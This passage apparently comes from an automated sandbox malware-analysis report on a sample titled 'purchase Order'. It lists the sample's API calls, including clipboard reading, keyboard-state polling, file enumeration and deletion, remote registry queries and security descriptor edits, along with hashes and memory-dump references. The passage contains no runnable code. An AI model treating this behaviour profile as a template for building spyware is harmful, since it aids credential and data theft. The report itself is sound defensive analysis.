                                                        • Opcode Fuzzy Hash: a5fcfe5efa608a8aaaf8d9c638410a963cd2be9302ab42de2733b8a9b02ee9ed
                                                        • Instruction Fuzzy Hash: 3951247280811C6ACB21FB91CC45EDF77BCAF05314F0901EAE595E3141DE3697499FA9
                                                        APIs
                                                        • OpenClipboard.USER32(00CDDC00), ref: 00C96B36
                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C96B44
                                                        • GetClipboardData.USER32(0000000D), ref: 00C96B4C
                                                        • CloseClipboard.USER32 ref: 00C96B58
                                                        • GlobalLock.KERNEL32(00000000), ref: 00C96B74
                                                        • CloseClipboard.USER32 ref: 00C96B7E
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00C96B93
                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00C96BA0
                                                        • GetClipboardData.USER32(00000001), ref: 00C96BA8
                                                        • GlobalLock.KERNEL32(00000000), ref: 00C96BB5
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00C96BE9
                                                        • CloseClipboard.USER32 ref: 00C96CF6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                        • String ID:
                                                        • API String ID: 3222323430-0
                                                        • Opcode ID: ea20b0293e1fa498c06693737dd54638320befa6c2b187323d9db3f6d542180c
                                                        • Instruction ID: a642db2292b4e0213cfc19b881da51ba389e4d2a40bb16a2588eff6958885f30
                                                        • Opcode Fuzzy Hash: ea20b0293e1fa498c06693737dd54638320befa6c2b187323d9db3f6d542180c
                                                        • Instruction Fuzzy Hash: B0516971200301ABD700AF64DD9AF6E77A8EF94B01F004429F696D62E1EF70D905EA62
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C8F62B
                                                        • FindClose.KERNEL32(00000000), ref: 00C8F67F
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C8F6A4
                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C8F6BB
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C8F6E2
                                                        • __swprintf.LIBCMT ref: 00C8F72E
                                                        • __swprintf.LIBCMT ref: 00C8F767
                                                        • __swprintf.LIBCMT ref: 00C8F7BB
                                                          • Part of subcall function 00C6172B: __woutput_l.LIBCMT ref: 00C61784
                                                        • __swprintf.LIBCMT ref: 00C8F809
                                                        • __swprintf.LIBCMT ref: 00C8F858
                                                        • __swprintf.LIBCMT ref: 00C8F8A7
                                                        • __swprintf.LIBCMT ref: 00C8F8F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 835046349-2428617273
                                                        • Opcode ID: 3c31a6220f9044a6eb4460801219a700e327d60208db9ee943821e5ba0f5f0d6
                                                        • Instruction ID: 783a064990c30d0c62797d044ef092cdbdd9b9d7f2d65b944fc045e3a8e16436
                                                        • Opcode Fuzzy Hash: 3c31a6220f9044a6eb4460801219a700e327d60208db9ee943821e5ba0f5f0d6
                                                        • Instruction Fuzzy Hash: D0A110B2408344ABC350EB95C885DAFB7ECFF98705F44092EF995C2152EB34EA49D762
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00C91B50
                                                        • _wcscmp.LIBCMT ref: 00C91B65
                                                        • _wcscmp.LIBCMT ref: 00C91B7C
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00C91B8E
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00C91BA8
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C91BC0
                                                        • FindClose.KERNEL32(00000000), ref: 00C91BCB
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00C91BE7
                                                        • _wcscmp.LIBCMT ref: 00C91C0E
                                                        • _wcscmp.LIBCMT ref: 00C91C25
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C91C37
                                                        • SetCurrentDirectoryW.KERNEL32(00CF39FC), ref: 00C91C55
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C91C5F
                                                        • FindClose.KERNEL32(00000000), ref: 00C91C6C
                                                        • FindClose.KERNEL32(00000000), ref: 00C91C7C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: 5653cd2d459fa0608f800f2d9d000436e818510dd01329beccdc2dd5985d737f
                                                        • Instruction ID: 26fa920a1ad060db0f0df746c0559e73840a9225a7f419dd25681dc74d058e2e
                                                        • Opcode Fuzzy Hash: 5653cd2d459fa0608f800f2d9d000436e818510dd01329beccdc2dd5985d737f
                                                        • Instruction Fuzzy Hash: DA31927254021A7BDF20AFB4DC4EFEE77AC9F05320F1841A6ED16E2190EB70DB458A64
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00C91CAB
                                                        • _wcscmp.LIBCMT ref: 00C91CC0
                                                        • _wcscmp.LIBCMT ref: 00C91CD7
                                                          • Part of subcall function 00C86BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C86BEF
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C91D06
                                                        • FindClose.KERNEL32(00000000), ref: 00C91D11
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00C91D2D
                                                        • _wcscmp.LIBCMT ref: 00C91D54
                                                        • _wcscmp.LIBCMT ref: 00C91D6B
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C91D7D
                                                        • SetCurrentDirectoryW.KERNEL32(00CF39FC), ref: 00C91D9B
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C91DA5
                                                        • FindClose.KERNEL32(00000000), ref: 00C91DB2
                                                        • FindClose.KERNEL32(00000000), ref: 00C91DC2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: ef08e86b4efa3719330d46f8a97b02103a4c9367db8bbb5d2e42bd74471cadeb
                                                        • Instruction ID: da48fb5817902637ee97d12882c285bfdb6194a8a5ed23885dc3d4d2d89f3a72
                                                        • Opcode Fuzzy Hash: ef08e86b4efa3719330d46f8a97b02103a4c9367db8bbb5d2e42bd74471cadeb
                                                        • Instruction Fuzzy Hash: E131D43250061A7ADF11EFA0DC4EFEE77AC9F45324F180565ED22A2190DB70DF458A64
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                        • API String ID: 2102423945-2023335898
                                                        • Opcode ID: b1983cda075d1aeafb28ff3af23a6f4272b1aa7887084bb6be0ae0dc645ca650
                                                        • Instruction ID: ff62a8c3d7aa7890b2332ed87fc809e1c77be62d967a351cac8dc9ffef38ab90
                                                        • Opcode Fuzzy Hash: b1983cda075d1aeafb28ff3af23a6f4272b1aa7887084bb6be0ae0dc645ca650
                                                        • Instruction Fuzzy Hash: A8829E71D04219CFDB24CF98C8807EDBBB1BF44314F25826AD869AB391E7749E85DB90
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 00C909DF
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C909EF
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C909FB
                                                        • __wsplitpath.LIBCMT ref: 00C90A59
                                                        • _wcscat.LIBCMT ref: 00C90A71
                                                        • _wcscat.LIBCMT ref: 00C90A83
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C90A98
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C90AAC
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C90ADE
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C90AFF
                                                        • _wcscpy.LIBCMT ref: 00C90B0B
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C90B4A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                        • String ID: *.*
                                                        • API String ID: 3566783562-438819550
                                                        • Opcode ID: 3b33b38fc4909ad4a994db3fd5a5e83f2ba8bd483c63a98a1c782123c91459af
                                                        • Instruction ID: d808a622736b903b87c7b60245a8b57297ea58d24bde18956fbb5273d4aa55bc
                                                        • Opcode Fuzzy Hash: 3b33b38fc4909ad4a994db3fd5a5e83f2ba8bd483c63a98a1c782123c91459af
                                                        • Instruction Fuzzy Hash: 56616D725043059FDB10EF60C885A9EB3E8FF89314F14496EF99AC7252DB31EA45CB92
                                                        APIs
                                                          • Part of subcall function 00C7ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C7ABD7
                                                          • Part of subcall function 00C7ABBB: GetLastError.KERNEL32(?,00C7A69F,?,?,?), ref: 00C7ABE1
                                                          • Part of subcall function 00C7ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00C7A69F,?,?,?), ref: 00C7ABF0
                                                          • Part of subcall function 00C7ABBB: HeapAlloc.KERNEL32(00000000,?,00C7A69F,?,?,?), ref: 00C7ABF7
                                                          • Part of subcall function 00C7ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C7AC0E
                                                          • Part of subcall function 00C7AC56: GetProcessHeap.KERNEL32(00000008,00C7A6B5,00000000,00000000,?,00C7A6B5,?), ref: 00C7AC62
                                                          • Part of subcall function 00C7AC56: HeapAlloc.KERNEL32(00000000,?,00C7A6B5,?), ref: 00C7AC69
                                                          • Part of subcall function 00C7AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C7A6B5,?), ref: 00C7AC7A
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C7A6D0
                                                        • _memset.LIBCMT ref: 00C7A6E5
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C7A704
                                                        • GetLengthSid.ADVAPI32(?), ref: 00C7A715
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00C7A752
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C7A76E
                                                        • GetLengthSid.ADVAPI32(?), ref: 00C7A78B
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C7A79A
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C7A7A1
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C7A7C2
                                                        • CopySid.ADVAPI32(00000000), ref: 00C7A7C9
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C7A7FA
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C7A820
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C7A834
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: 45b07f0b35850248fb55d3a1c18dfa9f6f01be9d52d6670daaec6fdb0f3de61f
                                                        • Instruction ID: 9b99e84aed633f86c3f0e7d62c8fb286a73497628f677bb496c605c0bd4255df
                                                        • Opcode Fuzzy Hash: 45b07f0b35850248fb55d3a1c18dfa9f6f01be9d52d6670daaec6fdb0f3de61f
                                                        • Instruction Fuzzy Hash: 2A514A71900209AFDF14DFA5DC45EEEBBB9FF44300F048129F929A7290DB359A06DB61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                        • API String ID: 0-4052911093
                                                        • Opcode ID: 0a8ebed856de77251e4da0f1d5ce0fa17afae5d97331915ab2ee4d5f33143134
                                                        • Instruction ID: 70c4e2a72de8877c880b5eb3f4a930c23c0d3a09158b1a39db479690add26980
                                                        • Opcode Fuzzy Hash: 0a8ebed856de77251e4da0f1d5ce0fa17afae5d97331915ab2ee4d5f33143134
                                                        • Instruction Fuzzy Hash: 72726E71E042199BDF24CF99D880BBEB7B5BF48310F14816EE915EB284DB709E81DB91
                                                        APIs
                                                          • Part of subcall function 00C86EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C85FA6,?), ref: 00C86ED8
                                                          • Part of subcall function 00C872CB: GetFileAttributesW.KERNEL32(?,00C86019), ref: 00C872CC
                                                        • _wcscat.LIBCMT ref: 00C86441
                                                        • __wsplitpath.LIBCMT ref: 00C8645F
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C86474
                                                        • _wcscpy.LIBCMT ref: 00C864A3
                                                        • _wcscat.LIBCMT ref: 00C864B8
                                                        • _wcscat.LIBCMT ref: 00C864CA
                                                        • DeleteFileW.KERNEL32(?), ref: 00C864DA
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C864EB
                                                        • FindClose.KERNEL32(00000000), ref: 00C86506
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                        • String ID: \*.*
                                                        • API String ID: 2643075503-1173974218
                                                        • Opcode ID: 76a616cf4a1190fc3c7e85f1214ec0a508dbec96f0cb7631368ad0c4c4eae28c
                                                        • Instruction ID: c8ab96d882964abbd0a034a1d62d2738b46561affdbd43b0884214c223cf204f
                                                        • Opcode Fuzzy Hash: 76a616cf4a1190fc3c7e85f1214ec0a508dbec96f0cb7631368ad0c4c4eae28c
                                                        • Instruction Fuzzy Hash: 133184B2408384AAC731EBA4C885EDFB7DCAF95314F44092EF6D9C3141EA35D6099767
                                                        APIs
                                                          • Part of subcall function 00CA3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CA2BB5,?,?), ref: 00CA3C1D
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CA328E
                                                          • Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
                                                          • Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CA332D
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CA33C5
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00CA3604
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CA3611
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: 1ad83aae3d79a3531f81c04fff164d9dc96960be0db21176f6e9f150870f1dac
                                                        • Instruction ID: 291201d4c9fe4e8df76d1700bbbc90573c0ed9d8369033b85617f0e2415c4290
                                                        • Opcode Fuzzy Hash: 1ad83aae3d79a3531f81c04fff164d9dc96960be0db21176f6e9f150870f1dac
                                                        • Instruction Fuzzy Hash: 1CE16C31604211AFCB14DF29C895E2ABBE8FF89714F04856DF45AD72A1DB30EE05DB52
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00C82B5F
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00C82BE0
                                                        • GetKeyState.USER32(000000A0), ref: 00C82BFB
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00C82C15
                                                        • GetKeyState.USER32(000000A1), ref: 00C82C2A
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00C82C42
                                                        • GetKeyState.USER32(00000011), ref: 00C82C54
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00C82C6C
                                                        • GetKeyState.USER32(00000012), ref: 00C82C7E
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00C82C96
                                                        • GetKeyState.USER32(0000005B), ref: 00C82CA8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: c9a1d9556f4be42e02067392838218c1b59f294510d8a0236c7f132fdea67f47
                                                        • Instruction ID: ce077a224ef66ef7778637a4d4a21fdc1dc0e0516860ef2b875bad2b05c1a83d
                                                        • Opcode Fuzzy Hash: c9a1d9556f4be42e02067392838218c1b59f294510d8a0236c7f132fdea67f47
                                                        • Instruction Fuzzy Hash: 0541C4706047C96EFF30BB60890C7BABEA06B1134CF044099D5D7562C1EBA49BC4C7AA
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: 2872d3760c2cbcce710899aab5be076b36a8ac768636e61c412237ad04a11f3d
                                                        • Instruction ID: 80d31bb591c3794d44a240d13be19f7d5bbaaf88d6ba733660d4776de4b3cb51
                                                        • Opcode Fuzzy Hash: 2872d3760c2cbcce710899aab5be076b36a8ac768636e61c412237ad04a11f3d
                                                        • Instruction Fuzzy Hash: AE215A36200210AFEB11AF65EC49F2EB7A8EF44711F048469F95ADB2A1DB34ED41DB54
                                                        APIs
                                                          • Part of subcall function 00C79ABF: CLSIDFromProgID.OLE32 ref: 00C79ADC
                                                          • Part of subcall function 00C79ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00C79AF7
                                                          • Part of subcall function 00C79ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00C79B05
                                                          • Part of subcall function 00C79ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00C79B15
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C9C235
                                                        • _memset.LIBCMT ref: 00C9C242
                                                        • _memset.LIBCMT ref: 00C9C360
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00C9C38C
                                                        • CoTaskMemFree.OLE32(?), ref: 00C9C397
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 00C9C3E5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 1300414916-2785691316
                                                        • Opcode ID: 209bca401922bc99cd15c92965a76214ec7e428540fe428c57cd509c46c6e9af
                                                        • Instruction ID: 966706e08c0cbabc70bc30998b598219765604387fa0baeacea5dfc43f5cfc5c
